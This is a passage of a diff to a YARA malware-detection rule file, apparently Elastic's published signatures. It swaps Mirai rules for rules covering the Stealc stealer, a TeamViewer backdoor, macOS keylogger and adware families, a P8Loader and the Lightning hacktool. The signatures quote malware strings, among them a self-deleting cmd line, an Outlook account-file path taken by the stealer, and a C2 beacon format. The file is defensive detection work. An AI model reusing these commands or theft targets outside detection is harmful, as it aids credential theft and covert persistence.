ascii fullword + $str2 = "%d/%d/%d %d:%d:%d" ascii fullword + $str3 = "%08lX%04lX%lu" ascii fullword + $str4 = "\\Outlook\\accounts.txt" ascii fullword + $str5 = "/c timeout /t 5 & del /f /q" ascii fullword condition: - all of them + (2 of ($seq*) or 4 of ($str*)) } -rule ELASTIC_Linux_Trojan_Mirai_24C5B7D6 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Stealc_A2B71Dc4 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Stealc (Windows.Trojan.Stealc)" author = "Elastic Security" - id = "24c5b7d6-1aa8-4d8e-9983-c7234f57c3de" - date = "2021-01-12" - modified = "2021-09-16" + id = "a2b71dc4-4041-4c1f-b546-a2b6947702d1" + date = "2024-03-13" + modified = "2024-03-21" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L478-L496" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7c2f8ba2d6f1e67d1b4a3a737a449429c322d945d49dafb9e8c66608ab2154c4" - logic_hash = "f790f6b8fcf932773054525ed74a3f15998d91a2626ae9c56486de8dabc2035c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Stealc.yar#L29-L50" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0d1c07c84c54348db1637e21260dbed09bd6b7e675ef58e003d0fe8f017fd2c8" + logic_hash = "b79ac3e65cd7d2819d6a49f59ec661241c97174f66a7c4ada91932f10fc43583" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3411b624f02dd1c7a0e663f1f119c8d5e47a81892bb7c445b7695c605b0b8ee2" + fingerprint = "9eeb13fededae39b8a531fa5d07eaf839b56a1c828ecd11322c604962e8b1aec" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 54 38 1C 80 FA 3E 74 25 80 FA 3A 74 20 80 FA 24 74 1B 80 FA 23 } + $seq_1 = { 8B C6 C1 E8 02 33 C6 D1 E8 33 C6 C1 E8 02 33 C6 83 E0 01 A3 D4 35 61 00 C1 E0 0F 66 D1 E9 66 0B C8 } + $seq_2 = { FF D3 8B 4D ?? E8 [4] 6A ?? 33 D2 5F 8B C8 F7 F7 85 D2 74 ?? } + $seq_3 = { 33 D2 8B F8 59 F7 F1 8B C7 3B D3 76 04 2B C2 03 C1 } + $seq_4 = { 6A 7C 58 66 89 45 FC 8D 45 F0 50 8D 45 FC 50 FF 75 08 C7 45 F8 01 } condition: - all of them + 2 of ($seq*) } -rule ELASTIC_Linux_Trojan_Mirai_99D78950 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Stealc_5D3F297C : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Stealc (Windows.Trojan.Stealc)" author = "Elastic Security" - id = "99d78950-ea23-4166-a85a-7a029209f5b1" - date = "2021-01-12" - modified = "2021-09-16" + id = "5d3f297c-b812-401a-8671-2e00369cd6f2" + date = "2024-03-05" + modified = "2024-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L498-L516" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6" - logic_hash = "bfd628a9973f85ed0a8be2723c7ff4bd028af00ea98c9cbcde9df6aabcf394b2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Stealc.yar#L52-L70" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "885c8cd8f7ad93f0fd43ba4fb7f14d94dfdee3d223715da34a6e2fbb4d25b9f4" + logic_hash = "556d3bc9374a5ec23faa410900dfc94b5534434c9733165355d281976444a42b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c" - severity = 100 + fingerprint = "ff90bfcb28bb3164fb11da5f35f289af679805f7e4047e48d97ae89e5b820dcd" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 } + $a1 = { 83 EC 08 C7 45 F8 00 00 00 00 83 7D 08 00 74 4A 83 7D 0C 00 74 44 8B 45 0C 83 C0 01 50 6A 40 ?? ?? ?? ?? ?? ?? 89 45 F8 83 7D F8 00 74 2C C7 45 FC 00 00 00 00 EB 09 8B 4D FC 83 C1 01 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_3Fe3C668 : FILE MEMORY +rule ELASTIC_Multi_Attacksimulation_Blindspot_D93F54C5 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Multi Attacksimulation Blindspot (Multi.AttackSimulation.Blindspot)" author = "Elastic Security" - id = "3fe3c668-89f4-4601-a167-f41bbd984ae5" - date = "2021-01-12" - modified = "2021-09-16" + id = "d93f54c5-6574-4999-a3c0-39ef688b28dc" + date = "2022-05-23" + modified = "2022-08-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L518-L535" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "e75b2dca7de7d9f31a0ae5940dc45d0e6d0f1ca110b5458fc99912400da97bde" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_AttackSimulation_Blindspot.yar#L1-L18" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "41984a0ad20ab21186252bb2f3f68604d2cbeea0e1ce22895dd163f7acbf2ca1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec" - severity = 100 - arch_context = "x86" + fingerprint = "4ec38f841aa4dfe32b1f6b6cd2e361c7298839ef1e983061cb90827135f34a58" + severity = 1 + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "multi" strings: - $a = { 00 84 C0 0F 95 C0 48 FF 45 E8 84 C0 75 E9 8B 45 FC C9 C3 55 48 } + $a = "\\\\.\\pipe\\blindspot-%d." condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_Eedfbfc6 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Amcleaner_445Bb666 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Macos Trojan Amcleaner (MacOS.Trojan.Amcleaner)" author = "Elastic Security" - id = "eedfbfc6-98a4-4817-a0d6-dcb065307f5c" - date = "2021-01-12" - modified = "2021-09-16" + id = "445bb666-1707-4ad9-a409-4a21de352957" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L537-L555" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b7342f7437a3a16805a7a8d4a667e0e018584f9a99591413650e05d21d3e6da6" - logic_hash = "949b32db1a00570fc84fbbe510f57f6e898d089efd3fedbd7719f8059021b6bc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Amcleaner.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c85bf71310882bc0c0cf9b74c9931fd19edad97600bc86ca51cf94ed85a78052" + logic_hash = "664829ff761186ec8f3055531b5490b7516756b0aa9d0183d4c17240a5ca44c4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c79058b4a40630cb4142493062318cdfda881259ac95b70d977816f85b82bb36" + fingerprint = "355c7298a4148be3b80fd841b483421bde28085c21c00d5e4a42949fd8026f5b" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 7C 39 57 52 AC 57 A8 CE A8 8C FC 53 A8 A8 0E 33 C2 AA 38 14 FB 29 } + $a = { 10 A0 5B 15 57 A8 8B 17 02 F9 A8 9B E8 D5 8C 96 A7 48 42 91 E5 EC 3D C8 AC 52 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_6D96Ae91 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Amcleaner_A91D3907 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Macos Trojan Amcleaner (MacOS.Trojan.Amcleaner)" author = "Elastic Security" - id = "6d96ae91-9d5c-48f1-928b-1562b120a74d" - date = "2021-01-12" - modified = "2021-09-16" + id = "a91d3907-5e24-46c0-90ef-ed7f46ad8792" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L557-L575" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e3a1d92df6fb566e09c389cfb085126d2ea0f51a776ec099afb8913ef5e96f9b" - logic_hash = "43b0ac7090620eb6c892f1105778c395bf18f5ac309ce1b2d9015b5abccbfc2a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Amcleaner.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "dc9c700f3f6a03ecb6e3f2801d4269599c32abce7bc5e6a1b7e6a64b0e025f58" + logic_hash = "e61ceea117acf444a6b137b93d7c335c6eb8a7e13a567177ec4ea44bf64fd5c6" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "fdbeaae0a96f3950d19aed497fae3e7a5517db141f53a1a6315b38b1d53d678b" + fingerprint = "c020567fde77a72d27c9c06f6ebb103f910321cc7a1c3b227e0965b079085b49" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 01 00 00 C1 00 00 00 0E 00 00 00 18 03 00 7F E9 38 32 C9 4D } + $a = { 40 22 4E 53 49 6D 61 67 65 56 69 65 77 22 2C 56 69 6E 6E 76 63 6A 76 64 69 5A } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_D8779A57 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Amcleaner_8Ce3Fea8 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Macos Trojan Amcleaner (MacOS.Trojan.Amcleaner)" author = "Elastic Security" - id = "d8779a57-c6ee-4627-9eb0-ab9305bd2454" - date = "2021-01-12" - modified = "2021-09-16" + id = "8ce3fea8-3cc7-4c59-b07c-a6dda0bb6b85" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L577-L595" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c490586fbf90d360cf3b2f9e2dc943809441df3dfd64dadad27fc9f5ee96ec74" - logic_hash = "2154786bbb6dbcc280aaa9e2b75106b585d04c7c85f6162f441c81dc54663cb3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Amcleaner.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c85bf71310882bc0c0cf9b74c9931fd19edad97600bc86ca51cf94ed85a78052" + logic_hash = "08c4b5b4afefbf1ee207525f9b28bc7eed7b55cb07f8576fddfa0bbe95002769" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "6c7a18cc03cacef5186d4c1f6ce05203cf8914c09798e345b41ce0dcee1ca9a6" + fingerprint = "e156d3c7a55cae84481df644569d1c5760e016ddcc7fd05d0f88fa8f9f9ffdae" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { B6 FF 41 89 D0 85 FF 74 29 38 56 08 74 28 48 83 C6 10 31 D2 } + $a = { 54 40 22 4E 53 54 61 62 6C 65 56 69 65 77 22 2C 56 69 6E 6E 76 63 6B 54 70 51 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_3E72E107 : FILE MEMORY +rule ELASTIC_Windows_Backdoor_Teamviewer_Df8E7326 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Backdoor Teamviewer (Windows.Backdoor.TeamViewer)" author = "Elastic Security" - id = "3e72e107-3647-4afd-a556-3c49dae7eb0c" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L597-L615" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "57d04035b68950246dd152054e949008dafb810f3705710d09911876cd44aec7" - logic_hash = "ba0ba56ded8977502ad9f8a1ceebd30efbff964d576bbfeedff5761f0538d8f0" + id = "df8e7326-5879-48d7-8a5f-1c9a2d8b7f8d" + date = "2022-10-29" + modified = "2022-12-20" + reference = "https://vms.drweb.com/virus/?i=8172096" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Backdoor_TeamViewer.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "68d9ffb6e00c2694d0d827108d0410d5a66d4f8cf839afddd17c5887b0149350" + logic_hash = "3d42c76626c76959e450a81001c73d8d47b52789cab324e0cc7af09303c1367d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3bca41fd44e5e9d8cdfb806fbfcaab3cc18baa268985b95e2f6d06ecdb58741a" + fingerprint = "0f2406e98fa1383e39672bd4ec32a111363f7d33f8bc33c2bd7ea36353faab45" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 10 85 C0 BA FF FF FF FF 74 14 8D 65 F4 5B 5E 5F 89 D0 5D C3 8D } + $a1 = "m%c%c%c%c%c%c.com" ascii fullword + $a2 = "client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d" ascii fullword + $a3 = "\\save.dat" ascii fullword + $a4 = "auth_ip" ascii fullword + $a5 = "updips" ascii fullword + $b1 = { 55 8B EC 56 E8 BF 25 00 00 50 E8 7B 5B 00 00 8B F0 59 85 F6 75 2C 8B 75 08 56 E8 A9 25 00 00 50 } condition: - all of them + 5 of ($a*) or 1 of ($b*) } -rule ELASTIC_Linux_Trojan_Mirai_5C62E6B2 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Aobokeylogger_Bd960F34 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Macos Trojan Aobokeylogger (MacOS.Trojan.Aobokeylogger)" author = "Elastic Security" - id = "5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b" - date = "2021-01-12" - modified = "2021-09-16" + id = "bd960f34-1932-41be-ac0a-f45ada22c560" + date = "2021-10-18" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L617-L635" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9" - logic_hash = "6505c4272f0f7c8c5f2d3f7cefdc3947c4015b0dfd94efde4357a506af93a99d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Aobokeylogger.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2b50146c20621741642d039f1e3218ff68e5dbfde8bb9edaa0a560ca890f0970" + logic_hash = "f89fbf1d6bf041de0ce32f7920818c34ce0eeb6779bb7fac6f223bbea1c6f6fa" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8" + fingerprint = "ae26a03d1973669cbeaabade8f3fd09ef2842b9617fa38e7b66dc4726b992a81" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48 } + $a = { 20 74 68 61 6E 20 32 30 30 20 6B 65 79 73 74 72 6F 6B 65 73 20 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_C5430Ff9 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Sythe_02B2811A : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Sythe (Windows.Trojan.Sythe)" author = "Elastic Security" - id = "c5430ff9-af40-4653-94c3-4651a5e9331e" - date = "2021-01-12" - modified = "2021-09-16" + id = "02b2811a-2ced-42b6-a9f1-6d983d1dc986" + date = "2023-05-10" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L637-L655" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5676773882a84d0efc220dd7595c4594bc824cbe3eeddfadc00ac3c8e899aa77" - logic_hash = "8c385980560cd4b24e703744b57a9d5ea1bca8fbeea066e98dd4b40009e56104" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Sythe.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2d54a8ba40cc9a1c74db7a889bc75a38f16ae2d025268aa07851c1948daa1b4d" + logic_hash = "ba472b35f583dd4cf125df575129d07de289d6d7dc12ecdcc518ce1eb9f18def" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a19dcb00fc5553d41978184cc53ef93c36eb9541ea19c6c50496b4e346aaf240" + fingerprint = "4dd9764e285985fbea5361e5edfa04e75fb8e3e7945cbbf712ea0183471e67ae" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 00 00 00 FC F3 A6 0F 97 C2 0F 92 C0 38 C2 75 29 83 EC 08 8B } + $a1 = "loadmodule" + $a2 = "--privileges" + $a3 = "--shutdown" + $a4 = "SetClientThreadID" condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_402Adc45 : FILE MEMORY +rule ELASTIC_Windows_Trojan_P8Loader_E478A831 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan P8Loader (Windows.Trojan.P8Loader)" author = "Elastic Security" - id = "402adc45-6279-44a6-b766-24706b0328fe" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L657-L675" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1ae0cd7e5bac967e31771873b4b41a1887abddfcdfcc76fa9149bb2054b03ca4" - logic_hash = "dab879d57507d5e119ddf4ce6ed33570c74f185a2260e97a7ec1d6c844943e5d" + id = "e478a831-b2a1-4436-8b17-ca92b9581c39" + date = "2023-04-13" + modified = "2023-05-26" + reference = "https://www.elastic.co/security-labs/elastic-charms-spectralviper" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_P8Loader.yar#L1-L26" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "f1a7de6bb4477ea82c18aea1ddc4481de2fc362ce5321f4205bb3b74c1c45a7e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "01b88411c40abc65c24d7a335027888c0cf48ad190dd3fa1b8e17d086a9b80a0" + fingerprint = "267743fc82c701d3029cde789eb471b49839001b21b90eeb20783382a56fb2c3" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C3 EB DF 5A 5B 5D 41 5C 41 5D C3 41 57 41 56 41 55 41 54 55 53 48 } + $a1 = "\t[+] Create pipe direct std success\n" fullword + $a2 = "\tPEAddress: %p\n" fullword + $a3 = "\tPESize: %ld\n" fullword + $a4 = "DynamicLoad(%s, %s) %d\n" fullword + $a5 = "LoadLibraryA(%s) FAILED in %s function, line %d" fullword + $a6 = "\t[+] No PE loaded on memory\n" wide fullword + $a7 = "\t[+] PE argument: %ws\n" wide fullword + $a8 = "LoadLibraryA(%s) FAILED in %s function, line %d" fullword condition: - all of them + 5 of them } -rule ELASTIC_Linux_Trojan_Mirai_A39Dfaa7 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Lightning_D9A9173A : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Hacktool Lightning (Linux.Hacktool.Lightning)" author = "Elastic Security" - id = "a39dfaa7-7d2c-4d40-bea5-bbebad522fa4" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L677-L694" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "98fde36fc412b6aa50c80c12118975a6bf754a9fba94f1cc3cdeed22565d6b0d" + id = "d9a9173a-6372-4892-8913-77f5749aa045" + date = "2022-11-08" + modified = "2024-02-13" + reference = "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Lightning.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "48f9471c20316b295704e6f8feb2196dd619799edec5835734fc24051f45c5b7" + logic_hash = "93961d9771aa4e828e15923064a848291c7814ad4e15e30cd252fc41523d789e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "95d12cb127c088d55fb0090a1cb0af8e0a02944ff56fd18bcb0834b148c17ad7" + fingerprint = "f6e9d662f22b6f08c5e6d32994d6ed933c6863870352dfb76e1540676663e7e0" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -78224,28 +78555,31 @@ rule ELASTIC_Linux_Trojan_Mirai_A39Dfaa7 : FILE MEMORY os = "linux" strings: - $a = { 00 6C 72 00 00 50 E8 4E 0C 00 00 EB 0E 5A 58 59 97 60 8A 54 } + $a1 = "cat /sys/class/net/%s/address" ascii fullword + $a2 = "{\"ComputerName\":\"%s\",\"Guid\":\"%s\",\"RequestName\":\"%s\",\"Licence\":\"%s\"}" ascii fullword + $a3 = "sleep 60 && ./%s &" ascii fullword + $a4 = "Lightning.Core" ascii fullword condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_E3E6D768 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Lightning_E87C9D50 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Hacktool Lightning (Linux.Hacktool.Lightning)" author = "Elastic Security" - id = "e3e6d768-6510-4eb2-a5ec-8cb8eead13f2" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L696-L714" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b505cb26d3ead5a0ef82d2c87a9b352cc0268ef0571f5e28defca7131065545e" - logic_hash = "b848c7200f405d77553d661a6c49fb958df225875957ead35b35091995f307d1" + id = "e87c9d50-dafc-45bd-8786-5df646108c8a" + date = "2022-11-08" + modified = "2024-02-13" + reference = "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Lightning.yar#L25-L48" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fd285c2fb4d42dde23590118dba016bf5b846625da3abdbe48773530a07bcd1e" + logic_hash = "455ecf97e7becaf9c40843f8a3f60ec233d35e0061c6994f168428a8835c1b20" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ce11f9c038c31440bcdf7f9d194d1a82be5d283b875cc6170a140c398747ff8c" + fingerprint = "22b982866241d50b6e5d964ee190f6d07982a5d3f0b2352d863c20432d5f785e" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -78253,27 +78587,32 @@ rule ELASTIC_Linux_Trojan_Mirai_E3E6D768 : FILE MEMORY os = "linux" strings: - $a = { 7E 14 48 89 DF 48 63 C8 4C 89 E6 FC F3 A4 41 01 C5 48 89 FB } + $a1 = "Execute %s Faild." ascii fullword + $a2 = "Lightning.Downloader" ascii fullword + $a3 = "Execute %s Success." ascii fullword + $a4 = "[-] Socks5 are Running!" ascii fullword + $a5 = "[-] Get FileInfo(%s) Faild!" ascii fullword condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_520Deeb8 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Lightning_3Bcac358 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Hacktool Lightning (Linux.Hacktool.Lightning)" author = "Elastic Security" - id = "520deeb8-cbc0-4225-8d23-adba5e040471" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L716-L733" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "671c17835f30cce1e5d68dbf3a73d340069b1b55a2ac42fc132c008cb2da622e" + id = "3bcac358-b4b9-43ae-b173-bebe0c9ff899" + date = "2022-11-08" + modified = "2024-02-13" + reference = "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/" + source_url = 